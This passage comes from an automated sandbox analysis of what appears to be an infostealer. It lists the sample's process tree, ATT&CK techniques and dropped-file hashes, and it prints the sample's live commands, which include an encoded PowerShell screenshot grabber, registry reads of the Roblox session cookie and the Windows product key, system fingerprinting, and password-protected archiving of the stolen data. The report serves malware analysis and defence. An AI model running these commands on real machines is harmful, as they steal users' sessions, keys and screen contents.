dABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4812
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1460
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uspikeuy\uspikeuy.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4432
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA568.tmp" "c:\Users\Admin\AppData\Local\Temp\uspikeuy\CSC7620553EB08048E29976E34E3C4C42CF.TMP"
        6⤵
        
        PID:972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4856
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4988
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:712
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4940
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3556
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:832
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:772
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:5076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1352
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1016
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3260
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32282\rar.exe a -r -hp"obey" "C:\Users\Admin\AppData\Local\Temp\UG1cA.zip" *"
    3⤵
    PID:1480
  - - C:\Users\Admin\AppData\Local\Temp\_MEI32282\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI32282\rar.exe a -r -hp"obey" "C:\Users\Admin\AppData\Local\Temp\UG1cA.zip" *
      4⤵
      Executes dropped EXE
      PID:2024
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3128
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3300
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4896
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5048
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5076
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
bd5940f08d0be56e65e5f2aaf47c538e

SHA1
d7e31b87866e5e383ab5499da64aba50f03e8443

SHA256
2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

SHA512
c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4603285a3c96b2940644709fd055860

SHA1
79c0f2c727fa0a31353d70b3cf1c1ff78cc3296d

SHA256
119d9d1ea6bd814661b91b5263f8a091ab6a70e6f50d6d845e195a739984c343

SHA512
25ff0c454b13ed714f4f3b028fe6425da9f1a198c7610857888d533d0ad2d2f75fdb3013395e5f0d1d8d2da7a6e8fd48849db5d64d4c8a699134ce29c1c1f7ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
88be3bc8a7f90e3953298c0fdbec4d72

SHA1
f4969784ad421cc80ef45608727aacd0f6bf2e4b

SHA256
533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

SHA512
4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA568.tmp

Filesize
1KB

MD5
9eeff860c88acadcaa0688071d120a36

SHA1
a19e36bdc2d05eed3ef32619fa966f3309be22c2

SHA256
bd87d80e8a992c861cf9f52ec603f2be5bc47b8bb393dcf07772f34b7bd522ca

SHA512
343eeab443c178643734b91c9ed32327961859db13474cbfcca0d95742b50e9e0bea3274b024ce81fddb4e60a51366811865bea5184247615ea368149f35b958

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\VCRUNTIME140.dll

Filesize
95KB

MD5
f34eb034aa4a9735218686590cba2e8b

SHA1
2bc20acdcb201676b77a66fa7ec6b53fa2644713

SHA256
9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

SHA512
d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_bz2.pyd

Filesize
44KB

MD5
c24b301f99a05305ac06c35f7f50307f

SHA1
0cee6de0ea38a4c8c02bf92644db17e8faa7093b

SHA256
c665f60b1663544facf9a026f5a87c8445558d7794baff56e42e65671d5adc24

SHA512
936d16fea3569a32a9941d58263e951623f4927a853c01ee187364df95cd246b3826e7b8423ac3c265965ee8e491275e908ac9e2d63f3abc5f721add8e20f699

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_ctypes.pyd

Filesize
55KB

MD5
5c0bda19c6bc2d6d8081b16b2834134e

SHA1
41370acd9cc21165dd1d4aa064588d597a84ebbe

SHA256
5e7192c18ad73daa71efade0149fbcaf734c280a6ee346525ea5d9729036194e

SHA512
b1b45fcbb1e39cb6ba7ac5f6828ee9c54767eabeedca35a79e7ba49fd17ad20588964f28d06a2dcf8b0446e90f1db41d3fca97d1a9612f6cc5eb816bd9dcdf8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_decimal.pyd

Filesize
102KB

MD5
604154d16e9a3020b9ad3b6312f5479c

SHA1
27c874b052d5e7f4182a4ead6b0486e3d0faf4da

SHA256
3c7585e75fa1e8604d8c408f77995b30f90c54a0f2ff5021e14fa7f84e093fb6

SHA512
37ce86fd8165fc51ebe568d7ce4b5ea8c1598114558d9f74a748a07dc62a1cc5d50fe1448dde6496ea13e45631e231221c15a64cebbb18fa96e2f71c61be0db4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_hashlib.pyd

Filesize
32KB

MD5
8ba5202e2f3fb1274747aa2ae7c3f7bf

SHA1
8d7dba77a6413338ef84f0c4ddf929b727342c16

SHA256
0541a0028619ab827f961a994667f9a8f1a48c8b315f071242a69d1bd6aeab8b

SHA512
d19322a1aba0da1aa68e24315cdbb10d63a5e3021b364b14974407dc3d25cd23df4ff1875b12339fd4613e0f3da9e5a78f1a0e54ffd8360ed764af20c3ecbb49

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_lzma.pyd

Filesize
82KB

MD5
215acc93e63fb03742911f785f8de71a

SHA1
d4e3b46db5d4fcdd4f6b6874b060b32a4b676bf9

SHA256
ffdbe11c55010d33867317c0dc2d1bd69f8c07bda0ea0d3841b54d4a04328f63

SHA512
9223a33e8235c566d280a169f52c819a83c3e6fa1f4b8127dde6d4a1b7e940df824ccaf8c0000eac089091fde6ae89f0322fe62e47328f07ea92c7705ace4a72

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_queue.pyd

Filesize
22KB

MD5
7b9f914d6c0b80c891ff7d5c031598d9

SHA1
ef9015302a668d59ca9eb6ebc106d82f65d6775c

SHA256
7f80508edff0896596993bf38589da38d95bc35fb286f81df361b5bf8c682cae

SHA512
d24c2ff50649fe604b09830fd079a6ad488699bb3c44ea7acb6da3f441172793e6a38a1953524f5570572bd2cf050f5fee71362a82c33f9bb9381ac4bb412d68

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_socket.pyd

Filesize
39KB

MD5
1f7e5e111207bc4439799ebf115e09ed

SHA1
e8b643f19135c121e77774ef064c14a3a529dca3

SHA256
179ebbe9fd241f89df31d881d9f76358d82cedee1a8fb40215c630f94eb37c04

SHA512
7f8a767b3e17920acfaafd4a7ed19b22862d8df5bdf4b50e0d53dfbf32e9f2a08f5cde97acecb8abf8f10fbbedb46c1d3a0b9eb168d11766246afe9e23ada6fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_sqlite3.pyd

Filesize
47KB

MD5
e5111e0cb03c73c0252718a48c7c68e4

SHA1
39a494eefecb00793b13f269615a2afd2cdfb648

SHA256
c9d4f10e47e45a23df9eb4ebb4c4f3c5153e7977dc2b92a1f142b8ccdb0bb26b

SHA512
cc0a00c552b98b6b80ffa4cd7cd20600e0e368fb71e816f3665e19c28ba9239fb9107f7303289c8db7de5208aaef8cd2159890996c69925176e6a04b6becc9b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\_ssl.pyd

Filesize
59KB

MD5
a65b98bf0f0a1b3ffd65e30a83e40da0

SHA1
9545240266d5ce21c7ed7b632960008b3828f758

SHA256
44214a85d06628eb3209980c0f2b31740ab8c6eb402f804816d0dae1ec379949

SHA512
0f70c2722722eb04b0b996bbaf7129955e38425794551c4832baec8844cde9177695d4045c0872a8fb472648c62c9bd502c9240facca9fb469f5cbacbe3ca505

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\base_library.zip

Filesize
859KB

MD5
05a324e21429f441ed44b25b6bb5505d

SHA1
0326e888ceb5c60ae7df40e414326221edce4766

SHA256
8f8ae82d51469c45147284d6e73c6b039c19263a688a0a154d04eee8756f3223

SHA512
a5655d4bffb2a3e7030c556747cf211c915285df08c3722124a70f4ae3379e3a9b472e999194e917d2c4f208077eea542c9914f9d56ad355fc0af3fe771f99df

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\blank.aes

Filesize
77KB

MD5
d7c7cbc56b2e48c70cccb61efdb6acfb

SHA1
1bb2020a3a09acf6555255b4839bbf28d0ada197

SHA256
f87b9c716559e4c361a059c6be6f64ed9db4d0b756bd010ed063283045e53ebd

SHA512
18a5c82c4803205579cd14dd701a16e175b232665b780ccd42a4be65787d3ccab0213675331b60865d9c70767de2bcf927ff9cfe885c0142db06c38615ae2c82

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\bound.blank

Filesize
204KB

MD5
38511faa2b8facc8b6360a39817b9d1f

SHA1
1b94aa7255c0d8e0621e4d414bda751ba1f79920

SHA256
36364b0d50b09e43a61c4374c1a5d46be1c76963053263aed9d9512d0303fec4

SHA512
fbc96e81d0f35171262e38aff70184ffaa4dc9a1b8b687d1b3c73ba784e3eaafbdc63413e6b710e1ee5982be35014f1064083166f00115788903d4429fdcd043

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\libcrypto-1_1.dll

Filesize
1.1MB

MD5
3cc020baceac3b73366002445731705a

SHA1
6d332ab68dca5c4094ed2ee3c91f8503d9522ac1

SHA256
d1aa265861d23a9b76f16906940d30f3a65c5d0597107ecb3d2e6d470b401bb8

SHA512
1d9b46d0331ed5b95dda8734abe3c0bd6f7fb1ec9a3269feab618d661a1644a0dc3bf8ac91778d5e45406d185965898fe87abd3261a6f7f2968c43515a48562c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\libffi-7.dll

Filesize
23KB

MD5
6f818913fafe8e4df7fedc46131f201f

SHA1
bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

SHA256
3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

SHA512
5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\libssl-1_1.dll

Filesize
200KB

MD5
7f77a090cb42609f2efc55ddc1ee8fd5

SHA1
ef5a128605654350a5bd17232120253194ad4c71

SHA256
47b63a9370289d2544abc5a479bfb27d707ae7db4f3f7b6cc1a8c8f57fd0cf1f

SHA512
a8a06a1303e76c76d1f06b689e163ba80c1a8137adac80fab0d5c1c6072a69d506e0360d8b44315ef1d88cbd0c9ac95c94d001fad5bc40727f1070734bbbbe63

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\python310.dll

Filesize
1.4MB

MD5
b93eda8cc111a5bde906505224b717c3

SHA1
5f1ae1ab1a3c4c023ea8138d4b09cbc1cd8e8f9e

SHA256
efa27cd726dbf3bf2448476a993dc0d5ffb0264032bf83a72295ab3fc5bcd983

SHA512
b20195930967b4dc9f60c15d9ceae4d577b00095f07bd93aa4f292b94a2e5601d605659e95d5168c1c2d85dc87a54d27775f8f20ebcacf56904e4aa30f1affba

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\select.pyd

Filesize
22KB

MD5
3cdfdb7d3adf9589910c3dfbe55065c9

SHA1
860ef30a8bc5f28ae9c81706a667f542d527d822

SHA256
92906737eff7ff33b9e2a72d2a86e4bd80a35018c8e40bb79433a8ea8ece3932

SHA512
1fe2c918e9ce524b855d7f38d4c69563f8b8c44291eea1dc98f04e5ebdc39c8f2d658a716429051fb91fed0b912520929a0b980c4f5b4ecb3de1c4eb83749a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\sqlite3.dll

Filesize
612KB

MD5
59ed17799f42cc17d63a20341b93b6f6

SHA1
5f8b7d6202b597e72f8b49f4c33135e35ac76cd1

SHA256
852b38bd2d05dd9f000e540d3f5e4962e64597eb864a68aa8bb28ce7008e91f1

SHA512
3424ad59fd71c68e0af716b7b94c4224b2abfb11b7613f2e565f5d82f630e89c2798e732376a3a0e1266d8d58730b2f76c4e23efe03c47a48cbf5f0fc165d333

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32282\unicodedata.pyd

Filesize
286KB

MD5
2218b2730b625b1aeee6a67095c101a4

SHA1
aa7f032b9c8b40e5ecf2a0f59fa5ae3f48eff90a

SHA256
5e9add4dd806c2de4d694b9bb038a6716badb7d5f912884d80d593592bcdb8ca

SHA512
77aa10ae645c0ba24e31dcab4726d8fb7aa3cb9708c7c85499e7d82ce46609d43e5dc74da7cd32c170c7ddf50c8db8945baf3452421316c4a46888d745de8da0

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mi5ty503.sc4.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\bound.exe

Filesize
377KB

MD5
239f81abeecfb3f3854df22c14f60306

SHA1
a23ef904b3f950bf9b479d5c407cddeb8d08c98f

SHA256
6a17542302832760d4329f237a706c936f7bb15664a485a55a500a2275ef0539

SHA512
eed92444d3a1dfe5c332d8af8365303edf4233a32d1f881f24d2894f86742c9235accd01b8ab5bb2b609ee4f779d20bf14f190e71c61a0f19c6265eb73af9af3

Download Submit
C:\Users\Admin\AppData\Local\Temp\uspikeuy\uspikeuy.dll

Filesize
4KB

MD5
60b271e91e945804eff546c8192be392

SHA1
b57e6da8a6308c7fc1d9eb20eec6f55f111a4233

SHA256
